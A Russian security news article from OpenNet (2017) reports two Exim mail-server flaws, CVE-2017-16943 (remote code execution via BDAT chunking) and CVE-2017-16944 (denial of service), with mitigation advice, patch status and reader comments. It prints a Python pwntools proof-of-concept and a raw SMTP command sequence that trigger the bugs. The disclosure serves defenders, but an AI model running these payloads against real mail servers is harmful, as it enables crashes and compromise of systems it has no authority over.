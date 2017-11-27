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27.11.2017 13:01  Уязвимость в Exim, позволяющая выполнить код на сервере

В почтовом сервере Exim выявлена критическая уязвимость (CVE-2017-16943), которая может привести к удалённому выполнению кода на сервере с правами управляющего процесса exim при передаче определённым образом оформленных команд по SMTP. Всем пользователям Exim в срочном порядке рекомендуется отключить расширение "ESMTP CHUNKING" (появилось в Exim 4.88) путем установки пустого значения в параметр "chunking_advertise_hosts" в файле конфигурации.

Уязвимость вызвана ошибкой, которая может привести к обращению к уже освобождённому блоку памяти в коде разбора заголовков почтового сообщения (функция receive_msg из файла receive.c). Заявлено, что известный вектор атаки применим только к веткам Exim 4.88 и 4.89, в которых поддерживается команда BDAT и расширение "ESMTP CHUNKING", предназначенные для кусочной передачи тела письма вместо передачи неделимым блоком при помощи команды DATA. При этом сторонние исследователи безопасности не исключают потенциальную возможность обнаружения других методов эксплуатации уязвимости.

Так как сведения об уязвимости были раскрыты через публично доступную систему отслеживания ошибок, без предварительного информирования в частном порядке, сведения об уязвимости опубликованы разработчиками Exim до выпуска обновления с устранением уязвимости. Для применения пока доступен только предварительный вариант патча. Обновления пакетов уже сформированы для FreeBSD. Проблема остаётся неисправленной в Debian (stretch), openSUSE, SUSE, Fedora, Ubuntu, RHEL/EPEL.

Для проверки подверженности уязвимости подготовлен прототип эксплоита, который сводится к передаче несуществующей команды с последующей отправкой команды "BDAT 1", команды BDAT без указания размера и большой порции непечатных символов. Пример на Python: 


   from pwn import *
   r = remote('localhost', 25)

   r.recvline()
   r.sendline("EHLO test")
   r.recvuntil("250 HELP")
   r.sendline("MAIL FROM:")
   r.recvline()
   r.sendline("RCPT TO:")
   r.recvline()
   #raw_input()
   r.sendline('a'*0x1100+'\x7f')
   #raw_input()
   r.recvuntil('command')
   r.sendline('BDAT 1')
   r.sendline(':BDAT \x7f')
   s = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)
   r.send(s+ ':\r\n')
   r.recvuntil('command')
   #raw_input()
   r.send('\n')
   r.interactive()
   exit()

Кроме того, в Exim дополнительно выявлена ещё одна уязвимость в реализации "ESMTP CHUNKING" (CVE-2017-16944), позволяющая вызвать отказ в обслуживании. Как и первая проблема вторая уязвимость присутствует в функции receive_msg из файла receive.c, но связана с некорректной проверкой символа "." в конце блока, переданного командой BDAT. Уязвимость приводит к бесконечному зацикливанию внутри функции bdat_getc и краху рабочего процесса из-за истечения свободной памяти, отведённой под стек. Для эксплуатации достаточно передать команды: 


   EHLO localhost
   MAIL FROM:
   RCPT TO:
   BDAT 10
   .
   BDAT 0


  1. Главная ссылка к новости (http://openwall.com/lists/oss-...)
  2. OpenNews: Обновление почтового сервера Exim 4.89
  3. OpenNews: Новая версия почтового сервера Exim 4.88 с устранением уязвимостей
  4. OpenNews: В почтовом сервере Exim 4.82.1 устранена критическая уязвимость
  5. OpenNews: Критическая локальная уязвимость в Exim
  6. OpenNews: Доступен почтовый сервер Exim 4.83 с устранением уязвимости
Лицензия: CC-BY
Тип: Проблемы безопасности
Ключевые слова: exim
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  • 1.1, Аноним, 13:22, 27/11/2017 [ответить] [смотреть все]    [к модератору]
    		• –7 +/
    Эх, сишники... В своем репертуаре
     
     
  • 2.2, Аноним, 13:32, 27/11/2017 [^] [ответить] [смотреть все]     [к модератору]
    		• +2 +/
    Postfix тоже на Си, но обязательные для выполнения правила безопасного кодирован... весь текст скрыт [показать]
     
  • 2.4, Аноним, 13:49, 27/11/2017 [^] [ответить] [смотреть все]    [к модератору]  
    		• +2 +/
    Эх, анонимы... В своем репертуаре
     
  • 2.6, Andrey Mitrofanov, 14:06, 27/11/2017 [^] [ответить] [смотреть все]    [к модератору]  
    		• +/
    > Эх, сишники... В своем репертуаре

    Раньше и https://security-tracker.debian.org/tracker/CVE-2017-16943 Debian-ы были зеленее[I]![/I]

    ---"Эх, внучо-о-о-к..."

     
  • 1.3, Аноним, 13:33, 27/11/2017 [ответить] [смотреть все]    [к модератору]  
    		• +1 +/
    шо, опять? (даже в предложенных новостях - одни уязвимости в сабже)
     
     
  • 2.5, нах, 13:49, 27/11/2017 [^] [ответить] [смотреть все]    [к модератору]  
    		• +1 +/
    > даже в предложенных новостях - одни уязвимости в сабже

    потому что новостей типа "а мы chunked smtp изобрели, для совместимости с не знаем пока, чем" на опеннет как-то никто не приносит.

    админов, действительно умеющих настраивать exim, а не выполняющих пункты найденых гуглем непойми-чьих инструкций и хауту десятилетней свежести, мало, у большинства "все работает" на версии десятилетней давности, и им это тоже неинтересно.

     
  • 1.7, Аноним, 14:07, 27/11/2017 [ответить] [смотреть все]     [к модератору]  
    		• +/
    В котором ... весь текст скрыт [показать]
     
     
  • 2.8, Аноним, 14:10, 27/11/2017 [^] [ответить] [смотреть все]    [к модератору]  
    		• +/
    Очевидно же exim.conf
     

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